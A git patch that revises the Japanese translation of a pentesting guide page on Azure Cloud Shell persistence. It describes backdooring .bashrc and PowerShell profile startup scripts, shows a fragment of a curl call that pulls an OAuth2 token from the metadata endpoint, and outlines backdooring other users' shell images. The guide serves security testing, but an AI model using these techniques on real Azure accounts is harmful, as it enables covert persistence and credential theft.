From f32a1f410cbe4ca938e1e16321cda843557d26f3 Mon Sep 17 00:00:00 2001 From: Translator Date: Wed, 14 May 2025 13:51:36 +0000 Subject: [PATCH] Translated ['src/pentesting-cloud/azure-security/az-persistence/az-cloud --- .../az-persistence/az-cloud-shell-persistence.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/src/pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md b/src/pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md index 451ba7ed1..c2338236e 100644 --- a/src/pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md +++ b/src/pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md @@ -4,9 +4,9 @@ ## Cloud Shell Persistence -Azure Cloud Shellは、永続的なストレージと自動認証を備えたAzureリソースを管理するためのコマンドラインアクセスを提供します。攻撃者は、永続的なホームディレクトリにバックドアを配置することでこれを悪用できます: +Azure Cloud Shellは、永続ストレージと自動認証を備えたAzureリソースを管理するためのコマンドラインアクセスを提供します。攻撃者は、永続的なホームディレクトリにバックドアを配置することでこれを悪用できます: -* **Persistent Storage**: Azure Cloud ShellのホームディレクトリはAzureファイル共有にマウントされており、セッションが終了しても保持されます。 +* **Persistent Storage**: Azure Cloud ShellのホームディレクトリはAzureファイル共有にマウントされており、セッションが終了してもそのまま保持されます。 * **Startup Scripts**: `.bashrc`や`config/PowerShell/Microsoft.PowerShell_profile.ps1`のようなファイルは、各セッションの開始時に自動的に実行され、クラウドシェルが起動する際に永続的な実行を可能にします。 Example backdoor in .bashrc: @@ -21,9 +21,9 @@ curl -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?a ``` ### Cloud Shell フィッシング -もし攻撃者がストレージアカウントに書き込みと読み取りアクセス権を持つ他のユーザーの画像を見つけた場合、彼はその画像をダウンロードし、**bashとPSのバックドアを追加し**、再びストレージアカウントにアップロードすることができるので、次回ユーザーがシェルにアクセスすると、**コマンドが自動的に実行される**。 +もし攻撃者がストレージアカウントに書き込みおよび読み取りアクセス権を持つ他のユーザーのイメージを見つけた場合、彼はそのイメージをダウンロードし、**bashおよびPSバックドアを追加し**、再びストレージアカウントにアップロードすることができるので、次回ユーザーがシェルにアクセスすると、**コマンドが自動的に実行される**。 -- **画像をダウンロードし、バックドアを追加してアップロードする:** +- **イメージをダウンロードし、バックドアを追加してアップロードする:** ```bash # Download image mkdir /tmp/phishing_img